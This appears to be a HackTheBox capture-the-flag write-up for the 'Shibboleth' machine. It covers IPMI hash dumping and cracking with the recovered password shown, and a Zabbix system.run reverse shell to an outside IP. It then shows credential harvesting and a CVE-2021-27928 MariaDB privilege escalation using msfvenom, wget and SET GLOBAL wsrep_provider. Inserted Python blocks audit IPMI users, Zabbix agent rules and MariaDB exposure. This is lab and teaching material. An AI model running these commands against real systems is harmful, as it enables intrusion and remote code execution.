HackTheBox - Shibboleth

Posted on Sat, Apr 2, 2022 Writeup HackTheBox IPMI Zabbix CVE-2021-27928

0x0 - Info card

0x1 - Network enumeration

Port scanning with nmap TCP/UDP

We are going to enumerate the open TCP ports on the remote machine.

nmap -sCV shibboleth.htb -T4

Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.12s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index

Strange, there is only one HTTP service.

And here we are going to enumerate the open UDP ports on the remote machine.

sudo nmap -sU -sCV shibboleth.htb -T4


PORT      STATE         SERVICE  VERSION
53/udp    open|filtered domain
623/udp   open          asf-rmcp
764/udp   open|filtered omserv
16786/udp open|filtered unknown
19294/udp open|filtered unknown
19500/udp open|filtered unknown
21186/udp open|filtered unknown
21967/udp open|filtered unknown
31059/udp open|filtered unknown
49186/udp open|filtered unknown
49188/udp open|filtered unknown
51255/udp open|filtered unknown
58797/udp open|filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.92%I=7%D=2/10%Time=620533C5%P=x86_64-pc-linux-gnu%r(ipm
SF:i-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x008\0\x01
SF:\x97\x04\x03\0\0\0\0\t");

Port 623 is interesting: it speaks RMCP, the remote management protocol used by IPMI and the BMC, which is very common in companies.

IPMI: Intelligent Platform Management Interface

BMC: Baseboard management controller

More info:

Intelligent Platform Management Interface - Wikipédia

The Intelligent Platform Management Interface (IPMI) is a set of interface specifications for an autonomous component of computer servers. This component is a computer (sometimes running a Linux kernel) that is independent of the host system's processor, firmware (BIOS, UEFI) and operating system.

We are going to see what we can do with it later...

0x2 - Web server enumeration (80/tcp)

feroxbuster -u http://shibboleth.htb/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -x php,sql,txt

After a little reconnaissance and manual enumeration I found nothing interesting or concrete.

By brute-forcing the virtual host name we find three subdomains:

$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://shibboleth.htb/ -H 'Host: FUZZ.shibboleth.htb' -fc 302

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : http://shibboleth.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.shibboleth.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 302
________________________________________________

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30]

We can access them by adding them to our /etc/hosts.

Again a tool used in business... Zabbix!

Zabbix is open source software for monitoring the status of various network services, servers and other network hardware.

But we will need credentials. Let's look at the IPMI service first.

0x3 - Pentesting 623/UDP/TCP - IPMI

There are many enumeration options, such as ipmitool, and there are also Metasploit modules.

623/UDP/TCP - IPMI

allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations. Note that to exploit this issue you first need to find a valid user.

A Penetration Tester's Guide to IPMI and BMCs | Rapid7 Blog

Dan Farmer is known for his groundbreaking work on security tools and processes. Over the last year, Dan has identified some serious security issues with the Intelligent Platform Management Interface (IPMI) protocol and the Baseboard Management Controllers (BMCs) that speak it.

By testing some modules I could get the hash of "Administrator" via the ipmi_dumphashes module, then crack it with hashcat (mode 7300, IPMI2 RAKP HMAC-SHA1):

hashcat -m 7300 -a 0 ipmi_hash /home/nuts/Downloads/rockyou.txt --force
af54fcaf842d0000b8a043c30ab8e70d2ee75fcb53b6c45726b7aa3dbe42e6c892503c8a9ca3d445a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:d7a75db0374861a5d31ebe0413c440e652db2dac:ilovepumkinpie1

We can enumerate the other users with ipmitool:

ipmitool -U "Administrator" -P "ilovepumkinpie1" -H shibboleth.htb user list
ID  Name        Callin  Link Auth    IPMI Msg   Channel Priv Limit
1                    true    false      false      USER
2   Administrator    true    false      true       ADMINISTRATOR
3   backdoor         true    false      true       ADMINISTRATOR

IPMI & IPMITOOL Cheat sheet - Knowledgebase - tzulo, inc.

The Intelligent Platform Management Interface (IPMI) is a standardized computer system interface used by system administrators for out-of-band management of computer systems and monitoring of their operation. Out-of-band, also referred to as LOM (Lights-out management), involves the use of a dedicated management channel for device maintenance. There are a number of options available to manage the device remotely.
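The user list above is also what a defender should review on every BMC: the anonymous user slot (ID 1, no name) and an extra ADMINISTRATOR account such as "backdoor" are the two things that stand out. The following Python, added here and not part of the write-up, parses `ipmitool user list` output and flags both; the OPERATOR row in the sample is constructed so that a harmless account is present.

```python
import re

# Constructed sample: the `ipmitool user list` rows quoted in this write-up,
# plus one made-up OPERATOR row so that a non-finding account is present.
SAMPLE_USER_LIST = """\
ID  Name        Callin  Link Auth    IPMI Msg   Channel Priv Limit
1                    true    false      false      USER
2   Administrator    true    false      true       ADMINISTRATOR
3   backdoor         true    false      true       ADMINISTRATOR
4   svc_monitor      true    false      false      OPERATOR
"""

# One row: id, optional name (the anonymous slot has none), three booleans,
# then the privilege limit, which may contain a space ("NO ACCESS").
ROW_RE = re.compile(
    r"^\s*(?P<id>\d+)\s+(?:(?P<name>(?!true\b|false\b)\S+)\s+)?"
    r"(?P<callin>true|false)\s+(?P<link>true|false)\s+"
    r"(?P<msg>true|false)\s+(?P<priv>[A-Z][A-Z ]*?)\s*$"
)

def parse_user_list(text):
    """Turn `ipmitool user list` output into a list of dicts."""
    users = []
    for line in text.splitlines()[1:]:          # skip the header row
        m = ROW_RE.match(line)
        if not m:
            continue                            # blank or unexpected line
        users.append({
            "id": int(m["id"]),
            "name": m["name"] or "",             # "" marks the anonymous slot
            "callin": m["callin"] == "true",
            "ipmi_msg": m["msg"] == "true",
            "priv": m["priv"].strip(),
        })
    return users

def audit_users(users, expected_admins=("Administrator",)):
    """Return (id, reason) pairs for accounts an operator should review."""
    findings = []
    for u in users:
        if u["name"] == "":
            findings.append((u["id"], "anonymous user slot has a privilege level set; disable it"))
        if u["priv"] == "ADMINISTRATOR" and u["name"] not in expected_admins:
            findings.append((u["id"], f"unexpected ADMINISTRATOR account {u['name']!r}"))
    return findings

if __name__ == "__main__":
    for uid, reason in audit_users(parse_user_list(SAMPLE_USER_LIST)):
        print(f"user {uid}: {reason}")
```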

Access to zabbix panel

Now that we have credentials we can try to log in to the Zabbix panel.

Here we go!

0x4 - FootHold

Now that we are on the panel we can get a reverse shell through Zabbix.

To do this, you have to create an item on a host so that the agent executes system.run[].

Note: here I use nohup and run the reverse shell in the background, because otherwise the agent connection closes after 3 seconds.

system.run[bash -c 'nohup bash -i >& /dev/tcp/10.10.14.158/4444 0>&1 &']
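The system.run[] key used above is exactly what the Zabbix agent's AllowKey/DenyKey directives (Zabbix 5.0 and later) exist to restrict. The following Python, added here and not part of the write-up or of Zabbix itself, models the agent's first-match rule evaluation over two constructed zabbix_agentd.conf fragments, so an operator can check whether a given config still lets the server push remote commands; the implicit deny when only AllowKey rules match nothing follows the Zabbix documentation, and the wildcard handling is a simplified model.

```python
import re

# Two constructed zabbix_agentd.conf fragments (not taken from the box): the
# first still lets the server run commands, the second denies system.run.
WEAK_CONF = """\
Server=10.0.0.5
AllowKey=system.run[*]
"""
HARDENED_CONF = """\
Server=10.0.0.5
DenyKey=system.run[*]
AllowKey=vfs.file.size[/var/log/*]
"""

def parse_rules(conf_text):
    """Collect AllowKey/DenyKey rules in file order as (allow, pattern)."""
    rules = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments
        name, sep, pattern = line.partition("=")
        if sep and name.strip() in ("AllowKey", "DenyKey"):
            rules.append((name.strip() == "AllowKey", pattern.strip()))
    return rules

def pattern_matches(pattern, key):
    """'*' stands for any run of characters, the rest is literal. Simplified
    model of the matching described in Zabbix's 'Restricting agent checks'."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, key) is not None

def key_allowed(rules, key):
    """First matching rule wins. If nothing matches, the key is allowed unless
    at least one AllowKey rule exists (the agent then denies everything else)."""
    for allow, pattern in rules:
        if pattern_matches(pattern, key):
            return allow
    return not any(allow for allow, _ in rules)

def remote_commands_possible(conf_text):
    """Could the server push a system.run[...] item to this agent?"""
    return key_allowed(parse_rules(conf_text), "system.run[id]")

if __name__ == "__main__":
    print("weak config allows system.run:", remote_commands_possible(WEAK_CONF))          # True
    print("hardened config allows system.run:", remote_commands_possible(HARDENED_CONF))  # False
```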

Horizontal privesc (zabbix to ipmi-svc)

This elevation of privilege is possible because the user reused a password, so we just have to authenticate with the password found earlier:

zabbix@shibboleth:/$ su ipmi-svc
su ipmi-svc
Password: ilovepumkinpie1
id
uid=1000(ipmi-svc) gid=1000(ipmi-svc) groups=1000(ipmi-svc)

0x5 - Vertical privesc (ipmi-svc to root)

We can find the database credentials in the Zabbix server configuration file:

ipmi-svc@shibboleth:/$ cat /etc/zabbix/zabbix_server.conf | grep "DBPass*\|DBUser*"
cat /etc/zabbix/zabbix_server.conf | grep "DBPass*\|DBUser*"
### Option: DBUser
# DBUser=
DBUser=zabbix
### Option: DBPassword
DBPassword=bloooarskybluh

zabbix:bloooarskybluh

Don't forget to spawn a TTY before connecting to MySQL: python3 -c 'import pty;pty.spawn("/bin/bash")'

The machine uses MariaDB; by enumerating we can see that the installed MariaDB version is vulnerable to a known flaw.

ipmi-svc@shibboleth:/$ mysql -u zabbix -pbloooarskybluh
mysql -u zabbix -pbloooarskybluh
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 856
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SELECT @@version;
SELECT @@version;
+----------------------------------+
| @@version                        |
+----------------------------------+
| 10.3.25-MariaDB-0ubuntu0.20.04.1 |
+----------------------------------+
1 row in set (0.000 sec)

CVE-2021-27928

The target is vulnerable to CVE-2021-27928

Let's go through a proof of concept for this CVE.

Step 1: Create the reverse shell payload

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

Step 2: Start listener

nc -lnvp <port>

Step 3: Copy the payload to the target machine

# local machine
sudo python3 -m http.server 80

# remote machine
/tmp: wget 1.1.1.1/CVE-2021-27928.so

Step 4: Execute the payload

mysql -u <user> -p -h <ip>
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";
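The SET GLOBAL wsrep_provider path needs two things at once: a MariaDB build older than the fix for its branch (10.2.37, 10.3.28, 10.4.18, 10.5.9, after which wsrep_provider can only be set from the config file) and a database account holding SUPER, or ALL PRIVILEGES, on *.*. The following Python, added here and not part of the write-up, checks both from a @@version string and SHOW GRANTS rows; the version is the one quoted above, while the two grant sets are constructed, since the write-up never shows the zabbix user's grants. Branches outside the advisory's list are reported as not affected by this CVE.

```python
import re

# Versions in which MariaDB made wsrep_provider/wsrep_notify_cmd read-only
# at runtime (from the CVE-2021-27928 advisory), keyed by release branch.
FIXED_IN = {
    (10, 2): (10, 2, 37),
    (10, 3): (10, 3, 28),
    (10, 4): (10, 4, 18),
    (10, 5): (10, 5, 9),
}

def parse_mariadb_version(version_string):
    """'10.3.25-MariaDB-0ubuntu0.20.04.1' -> (10, 3, 25); None if not MariaDB."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)-MariaDB", version_string)
    return tuple(int(x) for x in m.groups()) if m else None

def vulnerable_version(version_string):
    """True if older than the fix for its branch, False if fixed or the branch
    is not in the advisory, None if the string is not a MariaDB version."""
    v = parse_mariadb_version(version_string)
    if v is None:
        return None
    fixed = FIXED_IN.get(v[:2])
    return fixed is not None and v < fixed

def grants_include_super(grant_lines):
    """SUPER, or ALL PRIVILEGES, granted globally (ON *.*) is the second
    precondition: only such a session may SET GLOBAL wsrep_provider."""
    for grant in grant_lines:
        m = re.match(r"GRANT (.+?) ON \*\.\* TO", grant)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if "SUPER" in privs or "ALL PRIVILEGES" in privs:
            return True
    return False

def exposed(version_string, grant_lines):
    """Both conditions must hold for the wsrep_provider trick to work."""
    return bool(vulnerable_version(version_string)) and grants_include_super(grant_lines)

# Constructed inputs: the version from the write-up plus made-up SHOW GRANTS rows.
BOX_VERSION = "10.3.25-MariaDB-0ubuntu0.20.04.1"
OVERPRIVILEGED = ["GRANT ALL PRIVILEGES ON *.* TO `zabbix`@`localhost` IDENTIFIED BY PASSWORD '<hash>'"]
LEAST_PRIV = ["GRANT USAGE ON *.* TO `zabbix`@`localhost` IDENTIFIED BY PASSWORD '<hash>'",
              "GRANT SELECT, INSERT, UPDATE, DELETE ON `zabbix`.* TO `zabbix`@`localhost`"]

if __name__ == "__main__":
    print("overprivileged zabbix user exposed:", exposed(BOX_VERSION, OVERPRIVILEGED))  # True
    print("least-privilege zabbix user exposed:", exposed(BOX_VERSION, LEAST_PRIV))    # False
```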

0x6 - Champagne